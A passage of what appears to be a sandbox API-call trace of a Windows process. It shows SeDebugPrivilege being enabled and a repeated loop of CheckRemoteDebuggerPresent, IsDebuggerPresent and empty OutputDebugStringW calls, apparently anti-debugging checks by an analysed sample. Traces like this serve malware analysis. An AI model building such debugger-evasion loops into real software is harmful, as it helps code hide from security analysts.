CheckRemoteDebuggerPresent (in: hProcess=0x5d4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0181.231] IsDebuggerPresent () returned 0 [0181.231] GetCurrentProcessId () returned 0xf64 [0181.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5d8 [0181.232] GetExitCodeProcess (in: hProcess=0x5d8, lpExitCode=0x290cf28 | out: lpExitCode=0x290cf28*=0x103) returned 1 [0181.232] CloseHandle (hObject=0x5d8) returned 1 [0181.232] OutputDebugStringW (lpOutputString="") [0182.240] GetCurrentProcessId () returned 0xf64 [0182.240] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5dc [0182.240] GetExitCodeProcess (in: hProcess=0x5dc, lpExitCode=0x290d150 | out: lpExitCode=0x290d150*=0x103) returned 1 [0182.240] CheckRemoteDebuggerPresent (in: hProcess=0x5dc, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0182.240] IsDebuggerPresent () returned 0 [0182.241] GetCurrentProcessId () returned 0xf64 [0182.241] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5e0 [0182.241] GetExitCodeProcess (in: hProcess=0x5e0, lpExitCode=0x290d208 | out: lpExitCode=0x290d208*=0x103) returned 1 [0182.241] CloseHandle (hObject=0x5e0) returned 1 [0182.241] OutputDebugStringW (lpOutputString="") [0183.255] GetCurrentProcessId () returned 0xf64 [0183.255] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5e4 [0183.255] GetExitCodeProcess (in: hProcess=0x5e4, lpExitCode=0x290d430 | out: lpExitCode=0x290d430*=0x103) returned 1 [0183.255] CheckRemoteDebuggerPresent (in: hProcess=0x5e4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0183.255] IsDebuggerPresent () returned 0 [0183.255] GetCurrentProcessId () returned 0xf64 [0183.256] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5e8 [0183.256] GetExitCodeProcess (in: hProcess=0x5e8, lpExitCode=0x290d4e8 | out: lpExitCode=0x290d4e8*=0x103) returned 1 [0183.256] CloseHandle (hObject=0x5e8) returned 1 [0183.256] OutputDebugStringW (lpOutputString="") [0184.268] GetCurrentProcessId () returned 0xf64 [0184.268] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5ec [0184.268] GetExitCodeProcess (in: hProcess=0x5ec, lpExitCode=0x290d710 | out: lpExitCode=0x290d710*=0x103) returned 1 [0184.268] CheckRemoteDebuggerPresent (in: hProcess=0x5ec, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0184.268] IsDebuggerPresent () returned 0 [0184.269] GetCurrentProcessId () returned 0xf64 [0184.269] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5f0 [0184.269] GetExitCodeProcess (in: hProcess=0x5f0, lpExitCode=0x290d7c8 | out: lpExitCode=0x290d7c8*=0x103) returned 1 [0184.269] CloseHandle (hObject=0x5f0) returned 1 [0184.269] OutputDebugStringW (lpOutputString="") [0185.282] GetCurrentProcessId () returned 0xf64 [0185.282] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5f4 [0185.282] GetExitCodeProcess (in: hProcess=0x5f4, lpExitCode=0x290d9f0 | out: lpExitCode=0x290d9f0*=0x103) returned 1 [0185.282] CheckRemoteDebuggerPresent (in: hProcess=0x5f4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0185.282] IsDebuggerPresent () returned 0 [0185.282] GetCurrentProcessId () returned 0xf64 [0185.283] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5f8 [0185.283] GetExitCodeProcess (in: hProcess=0x5f8, lpExitCode=0x290daa8 | out: lpExitCode=0x290daa8*=0x103) returned 1 [0185.283] CloseHandle (hObject=0x5f8) returned 1 [0185.283] OutputDebugStringW (lpOutputString="") [0186.296] GetCurrentProcessId () returned 0xf64 [0186.296] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5fc [0186.297] GetExitCodeProcess (in: hProcess=0x5fc, lpExitCode=0x290dcd0 | out: lpExitCode=0x290dcd0*=0x103) returned 1 [0186.297] CheckRemoteDebuggerPresent (in: hProcess=0x5fc, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0186.297] IsDebuggerPresent () returned 0 [0186.297] GetCurrentProcessId () returned 0xf64 [0186.298] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x600 [0186.298] GetExitCodeProcess (in: hProcess=0x600, lpExitCode=0x290dd88 | out: lpExitCode=0x290dd88*=0x103) returned 1 [0186.298] CloseHandle (hObject=0x600) returned 1 [0186.298] OutputDebugStringW (lpOutputString="") [0187.310] GetCurrentProcessId () returned 0xf64 [0187.310] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x604 [0187.310] GetExitCodeProcess (in: hProcess=0x604, lpExitCode=0x290dfb0 | out: lpExitCode=0x290dfb0*=0x103) returned 1 [0187.310] CheckRemoteDebuggerPresent (in: hProcess=0x604, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0187.311] IsDebuggerPresent () returned 0 [0187.311] GetCurrentProcessId () returned 0xf64 [0187.311] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x608 [0187.311] GetExitCodeProcess (in: hProcess=0x608, lpExitCode=0x290e074 | out: lpExitCode=0x290e074*=0x103) returned 1 [0187.311] CloseHandle (hObject=0x608) returned 1 [0187.312] OutputDebugStringW (lpOutputString="") [0188.324] GetCurrentProcessId () returned 0xf64 [0188.324] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x60c [0188.324] GetExitCodeProcess (in: hProcess=0x60c, lpExitCode=0x290e29c | out: lpExitCode=0x290e29c*=0x103) returned 1 [0188.324] CheckRemoteDebuggerPresent (in: hProcess=0x60c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0188.324] IsDebuggerPresent () returned 0 [0188.324] GetCurrentProcessId () returned 0xf64 [0188.324] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x610 [0188.325] GetExitCodeProcess (in: hProcess=0x610, lpExitCode=0x290e354 | out: lpExitCode=0x290e354*=0x103) returned 1 [0188.325] CloseHandle (hObject=0x610) returned 1 [0188.325] OutputDebugStringW (lpOutputString="") [0189.539] GetCurrentProcessId () returned 0xf64 [0189.539] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x614 [0189.539] GetExitCodeProcess (in: hProcess=0x614, lpExitCode=0x290e57c | out: lpExitCode=0x290e57c*=0x103) returned 1 [0189.540] CheckRemoteDebuggerPresent (in: hProcess=0x614, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0189.540] IsDebuggerPresent () returned 0 [0189.540] GetCurrentProcessId () returned 0xf64 [0189.540] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x618 [0189.540] GetExitCodeProcess (in: hProcess=0x618, lpExitCode=0x290e634 | out: lpExitCode=0x290e634*=0x103) returned 1 [0189.540] CloseHandle (hObject=0x618) returned 1 [0189.540] OutputDebugStringW (lpOutputString="") [0190.578] GetCurrentProcessId () returned 0xf64 [0190.579] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x61c [0190.579] GetExitCodeProcess (in: hProcess=0x61c, lpExitCode=0x290e880 | out: lpExitCode=0x290e880*=0x103) returned 1 [0190.579] CheckRemoteDebuggerPresent (in: hProcess=0x61c, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0190.579] IsDebuggerPresent () returned 0 [0190.579] GetCurrentProcessId () returned 0xf64 [0190.579] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x620 [0190.580] GetExitCodeProcess (in: hProcess=0x620, lpExitCode=0x290e938 | out: lpExitCode=0x290e938*=0x103) returned 1 [0190.580] CloseHandle (hObject=0x620) returned 1 [0190.580] OutputDebugStringW (lpOutputString="") [0191.602] GetCurrentProcessId () returned 0xf64 [0191.602] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x624 [0191.602] GetExitCodeProcess (in: hProcess=0x624, lpExitCode=0x290ebf8 | out: lpExitCode=0x290ebf8*=0x103) returned 1 [0191.602] CheckRemoteDebuggerPresent (in: hProcess=0x624, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0191.602] IsDebuggerPresent () returned 0 [0191.603] GetCurrentProcessId () returned 0xf64 [0191.603] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x628 [0191.603] GetExitCodeProcess (in: hProcess=0x628, lpExitCode=0x290ecb0 | out: lpExitCode=0x290ecb0*=0x103) returned 1 [0191.603] CloseHandle (hObject=0x628) returned 1 [0191.603] OutputDebugStringW (lpOutputString="") Thread: id = 6 os_tid = 0xf90 [0062.100] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0062.146] GetCurrentProcessId () returned 0xf64 [0062.311] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x4f5ee4c | out: lpLuid=0x4f5ee4c*(LowPart=0x14, HighPart=0)) returned 1 [0062.330] GetCurrentProcess () returned 0xffffffff [0062.331] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x4f5ee48 | out: TokenHandle=0x4f5ee48*=0x21c) returned 1 [0062.333] AdjustTokenPrivileges (in: TokenHandle=0x21c, DisableAllPrivileges=0, NewState=0x28961b4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0062.333] CloseHandle (hObject=0x21c) returned 1 [0062.334] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x21c [0062.334] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2894acc | out: lpExitCode=0x2894acc*=0x103) returned 1 [0062.345] CheckRemoteDebuggerPresent (in: hProcess=0x21c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0062.352] IsDebuggerPresent () returned 0 [0062.355] GetCurrentProcessId () returned 0xf64 [0062.358] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x220 [0062.358] GetExitCodeProcess (in: hProcess=0x220, lpExitCode=0x2896254 | out: lpExitCode=0x2896254*=0x103) returned 1 [0062.364] CloseHandle (hObject=0x220) returned 1 [0062.380] OutputDebugStringW (lpOutputString="") [0066.770] GetCurrentProcessId () returned 0xf64 [0066.770] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x258 [0066.770] GetExitCodeProcess (in: hProcess=0x258, lpExitCode=0x2899c10 | out: lpExitCode=0x2899c10*=0x103) returned 1 [0066.770] CheckRemoteDebuggerPresent (in: hProcess=0x258, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0066.770] IsDebuggerPresent () returned 0 [0066.770] GetCurrentProcessId () returned 0xf64 [0066.771] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x260 [0066.771] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0x2899cc8 | out: lpExitCode=0x2899cc8*=0x103) returned 1 [0066.771] CloseHandle (hObject=0x260) returned 1 [0066.771] OutputDebugStringW (lpOutputString="") [0069.764] GetCurrentProcessId () returned 0xf64 [0069.764] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x274 [0069.764] GetExitCodeProcess (in: hProcess=0x274, lpExitCode=0x28db55c | out: lpExitCode=0x28db55c*=0x103) returned 1 [0069.764] CheckRemoteDebuggerPresent (in: hProcess=0x274, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0069.764] IsDebuggerPresent () returned 0 [0069.765] GetCurrentProcessId () returned 0xf64 [0069.765] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x278 [0069.765] GetExitCodeProcess (in: hProcess=0x278, lpExitCode=0x28db614 | out: lpExitCode=0x28db614*=0x103) returned 1 [0069.765] CloseHandle (hObject=0x278) returned 1 [0069.765] OutputDebugStringW (lpOutputString="") [0070.782] GetCurrentProcessId () returned 0xf64 [0070.782] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x280 [0070.782] GetExitCodeProcess (in: hProcess=0x280, lpExitCode=0x28df550 | out: lpExitCode=0x28df550*=0x103) returned 1 [0070.782] CheckRemoteDebuggerPresent (in: hProcess=0x280, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0070.782] IsDebuggerPresent () returned 0 [0070.782] GetCurrentProcessId () returned 0xf64 [0070.783] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x27c [0070.783] GetExitCodeProcess (in: hProcess=0x27c, lpExitCode=0x28df608 | out: lpExitCode=0x28df608*=0x103) returned 1 [0070.783] CloseHandle (hObject=0x27c) returned 1 [0070.783] OutputDebugStringW (lpOutputString="") [0071.792] GetCurrentProcessId () returned 0xf64 [0071.792] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2d8 [0071.792] GetExitCodeProcess (in: hProcess=0x2d8, lpExitCode=0x28f5df8 | out: lpExitCode=0x28f5df8*=0x103) returned 1 [0071.792] CheckRemoteDebuggerPresent (in: hProcess=0x2d8, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0071.792] IsDebuggerPresent () returned 0 [0071.792] GetCurrentProcessId () returned 0xf64 [0071.792] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2d4 [0071.792] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x28f5eb0 | out: lpExitCode=0x28f5eb0*=0x103) returned 1 [0071.793] CloseHandle (hObject=0x2d4) returned 1 [0071.793] OutputDebugStringW (lpOutputString="") [0072.806] GetCurrentProcessId () returned 0xf64 [0072.806] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2dc [0072.806] GetExitCodeProcess (in: hProcess=0x2dc, lpExitCode=0x28f60e4 | out: lpExitCode=0x28f60e4*=0x103) returned 1 [0072.806] CheckRemoteDebuggerPresent (in: hProcess=0x2dc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0072.807] IsDebuggerPresent () returned 0 [0072.807] GetCurrentProcessId () returned 0xf64 [0072.807] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2e0 [0072.807] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x28f619c | out: lpExitCode=0x28f619c*=0x103) returned 1 [0072.807] CloseHandle (hObject=0x2e0) returned 1 [0072.807] OutputDebugStringW (lpOutputString="") [0074.041] GetCurrentProcessId () returned 0xf64 [0074.042] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2ec [0074.042] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x28f6dfc | out: lpExitCode=0x28f6dfc*=0x103) returned 1 [0074.042] CheckRemoteDebuggerPresent (in: hProcess=0x2ec, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0074.042] IsDebuggerPresent () returned 0 [0074.042] GetCurrentProcessId () returned 0xf64 [0074.042] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f0 [0074.042] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x28f6eb4 | out: lpExitCode=0x28f6eb4*=0x103) returned 1 [0074.042] CloseHandle (hObject=0x2f0) returned 1 [0074.043] OutputDebugStringW (lpOutputString="") [0078.933] GetCurrentProcessId () returned 0xf64 [0078.934] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2fc [0078.934] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x28fcb50 | out: lpExitCode=0x28fcb50*=0x103) returned 1 [0078.934] CheckRemoteDebuggerPresent (in: hProcess=0x2fc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0078.934] IsDebuggerPresent () returned 0 [0078.934] GetCurrentProcessId () returned 0xf64 [0078.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x300 [0078.935] GetExitCodeProcess (in: hProcess=0x300, lpExitCode=0x28fcc08 | out: lpExitCode=0x28fcc08*=0x103) returned 1 [0078.935] CloseHandle (hObject=0x300) returned 1 [0078.935] OutputDebugStringW (lpOutputString="") [0079.936] GetCurrentProcessId () returned 0xf64 [0079.936] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x304 [0079.936] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x28fce30 | out: lpExitCode=0x28fce30*=0x103) returned 1 [0079.936] CheckRemoteDebuggerPresent (in: hProcess=0x304, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0079.936] IsDebuggerPresent () returned 0 [0079.936] GetCurrentProcessId () returned 0xf64 [0079.936] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x308 [0079.937] GetExitCodeProcess (in: hProcess=0x308, lpExitCode=0x28fcee8 | out: lpExitCode=0x28fcee8*=0x103) returned 1 [0079.937] CloseHandle (hObject=0x308) returned 1 [0079.937] OutputDebugStringW (lpOutputString="") [0081.239] GetCurrentProcessId () returned 0xf64 [0081.239] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x30c [0081.239] GetExitCodeProcess (in: hProcess=0x30c, lpExitCode=0x28fd110 | out: lpExitCode=0x28fd110*=0x103) returned 1 [0081.239] CheckRemoteDebuggerPresent (in: hProcess=0x30c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0081.239] IsDebuggerPresent () returned 0 [0081.239] GetCurrentProcessId () returned 0xf64 [0081.240] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x310 [0081.240] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x28fd1c8 | out: lpExitCode=0x28fd1c8*=0x103) returned 1 [0081.240] CloseHandle (hObject=0x310) returned 1 [0081.240] OutputDebugStringW (lpOutputString="") [0082.690] GetCurrentProcessId () returned 0xf64 [0082.691] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x314 [0082.691] GetExitCodeProcess (in: hProcess=0x314, lpExitCode=0x28fd3f0 | out: lpExitCode=0x28fd3f0*=0x103) returned 1 [0082.691] CheckRemoteDebuggerPresent (in: hProcess=0x314, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0082.691] IsDebuggerPresent () returned 0 [0082.691] GetCurrentProcessId () returned 0xf64 [0082.691] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x318 [0082.691] GetExitCodeProcess (in: hProcess=0x318, lpExitCode=0x28fd4a8 | out: lpExitCode=0x28fd4a8*=0x103) returned 1 [0082.691] CloseHandle (hObject=0x318) returned 1 [0082.692] OutputDebugStringW (lpOutputString="") [0083.728] GetCurrentProcessId () returned 0xf64 [0083.728] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x31c [0083.728] GetExitCodeProcess (in: hProcess=0x31c, lpExitCode=0x28fd6d0 | out: lpExitCode=0x28fd6d0*=0x103) returned 1 [0083.728] CheckRemoteDebuggerPresent (in: hProcess=0x31c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0083.728] IsDebuggerPresent () returned 0 [0083.729] GetCurrentProcessId () returned 0xf64 [0083.729] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x320 [0083.729] GetExitCodeProcess (in: hProcess=0x320, lpExitCode=0x28fd788 | out: lpExitCode=0x28fd788*=0x103) returned 1 [0083.729] CloseHandle (hObject=0x320) returned 1 [0083.729] OutputDebugStringW (lpOutputString="") [0084.756] GetCurrentProcessId () returned 0xf64 [0084.756] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x324 [0084.757] GetExitCodeProcess (in: hProcess=0x324, lpExitCode=0x28fd9b0 | out: lpExitCode=0x28fd9b0*=0x103) returned 1 [0084.757] CheckRemoteDebuggerPresent (in: hProcess=0x324, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0084.757] IsDebuggerPresent () returned 0 [0084.757] GetCurrentProcessId () returned 0xf64 [0084.757] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x328 [0084.757] GetExitCodeProcess (in: hProcess=0x328, lpExitCode=0x28fda68 | out: lpExitCode=0x28fda68*=0x103) returned 1 [0084.757] CloseHandle (hObject=0x328) returned 1 [0084.757] OutputDebugStringW (lpOutputString="") [0088.734] GetCurrentProcessId () returned 0xf64 [0088.734] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x32c [0088.734] GetExitCodeProcess (in: hProcess=0x32c, lpExitCode=0x28fdc90 | out: lpExitCode=0x28fdc90*=0x103) returned 1 [0088.734] CheckRemoteDebuggerPresent (in: hProcess=0x32c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0088.734] IsDebuggerPresent () returned 0 [0088.734] GetCurrentProcessId () returned 0xf64 [0088.735] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x330 [0088.735] GetExitCodeProcess (in: hProcess=0x330, lpExitCode=0x28fdd48 | out: lpExitCode=0x28fdd48*=0x103) returned 1 [0088.735] CloseHandle (hObject=0x330) returned 1 [0088.735] OutputDebugStringW (lpOutputString="") [0089.752] GetCurrentProcessId () returned 0xf64 [0089.752] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x334 [0089.752] GetExitCodeProcess (in: hProcess=0x334, lpExitCode=0x28fdf70 | out: lpExitCode=0x28fdf70*=0x103) returned 1 [0089.752] CheckRemoteDebuggerPresent (in: hProcess=0x334, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0089.752] IsDebuggerPresent () returned 0 [0089.752] GetCurrentProcessId () returned 0xf64 [0089.753] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x338 [0089.753] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x28fe028 | out: lpExitCode=0x28fe028*=0x103) returned 1 [0089.753] CloseHandle (hObject=0x338) returned 1 [0089.753] OutputDebugStringW (lpOutputString="") [0090.777] GetCurrentProcessId () returned 0xf64 [0090.778] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x33c [0090.778] GetExitCodeProcess (in: hProcess=0x33c, lpExitCode=0x28fe250 | out: lpExitCode=0x28fe250*=0x103) returned 1 [0090.778] CheckRemoteDebuggerPresent (in: hProcess=0x33c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0090.778] IsDebuggerPresent () returned 0 [0090.778] GetCurrentProcessId () returned 0xf64 [0090.778] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x340 [0090.778] GetExitCodeProcess (in: hProcess=0x340, lpExitCode=0x28fe308 | out: lpExitCode=0x28fe308*=0x103) returned 1 [0090.779] CloseHandle (hObject=0x340) returned 1 [0090.779] OutputDebugStringW (lpOutputString="") [0091.791] GetCurrentProcessId () returned 0xf64 [0091.791] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x344 [0091.791] GetExitCodeProcess (in: hProcess=0x344, lpExitCode=0x28fe530 | out: lpExitCode=0x28fe530*=0x103) returned 1 [0091.792] CheckRemoteDebuggerPresent (in: hProcess=0x344, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0091.792] IsDebuggerPresent () returned 0 [0091.792] GetCurrentProcessId () returned 0xf64 [0091.792] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x348 [0091.792] GetExitCodeProcess (in: hProcess=0x348, lpExitCode=0x28fe5e8 | out: lpExitCode=0x28fe5e8*=0x103) returned 1 [0091.792] CloseHandle (hObject=0x348) returned 1 [0091.792] OutputDebugStringW (lpOutputString="") [0092.805] GetCurrentProcessId () returned 0xf64 [0092.805] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x34c [0092.805] GetExitCodeProcess (in: hProcess=0x34c, lpExitCode=0x28fe81c | out: lpExitCode=0x28fe81c*=0x103) returned 1 [0092.806] CheckRemoteDebuggerPresent (in: hProcess=0x34c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0092.806] IsDebuggerPresent () returned 0 [0092.806] GetCurrentProcessId () returned 0xf64 [0092.806] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x350 [0092.806] GetExitCodeProcess (in: hProcess=0x350, lpExitCode=0x28fe8d4 | out: lpExitCode=0x28fe8d4*=0x103) returned 1 [0092.806] CloseHandle (hObject=0x350) returned 1 [0092.806] OutputDebugStringW (lpOutputString="") [0093.835] GetCurrentProcessId () returned 0xf64 [0093.835] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x354 [0093.835] GetExitCodeProcess (in: hProcess=0x354, lpExitCode=0x28feafc | out: lpExitCode=0x28feafc*=0x103) returned 1 [0093.835] CheckRemoteDebuggerPresent (in: hProcess=0x354, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0093.835] IsDebuggerPresent () returned 0 [0093.836] GetCurrentProcessId () returned 0xf64 [0093.836] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x358 [0093.836] GetExitCodeProcess (in: hProcess=0x358, lpExitCode=0x28febb4 | out: lpExitCode=0x28febb4*=0x103) returned 1 [0093.836] CloseHandle (hObject=0x358) returned 1 [0093.836] OutputDebugStringW (lpOutputString="") [0094.851] GetCurrentProcessId () returned 0xf64 [0094.852] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x35c [0094.852] GetExitCodeProcess (in: hProcess=0x35c, lpExitCode=0x28feddc | out: lpExitCode=0x28feddc*=0x103) returned 1 [0094.852] CheckRemoteDebuggerPresent (in: hProcess=0x35c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0094.852] IsDebuggerPresent () returned 0 [0094.852] GetCurrentProcessId () returned 0xf64 [0094.852] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x360 [0094.852] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x28fee94 | out: lpExitCode=0x28fee94*=0x103) returned 1 [0094.853] CloseHandle (hObject=0x360) returned 1 [0094.853] OutputDebugStringW (lpOutputString="") [0095.863] GetCurrentProcessId () returned 0xf64 [0095.864] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x364 [0095.864] GetExitCodeProcess (in: hProcess=0x364, lpExitCode=0x28ff0bc | out: lpExitCode=0x28ff0bc*=0x103) returned 1 [0095.864] CheckRemoteDebuggerPresent (in: hProcess=0x364, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0095.865] IsDebuggerPresent 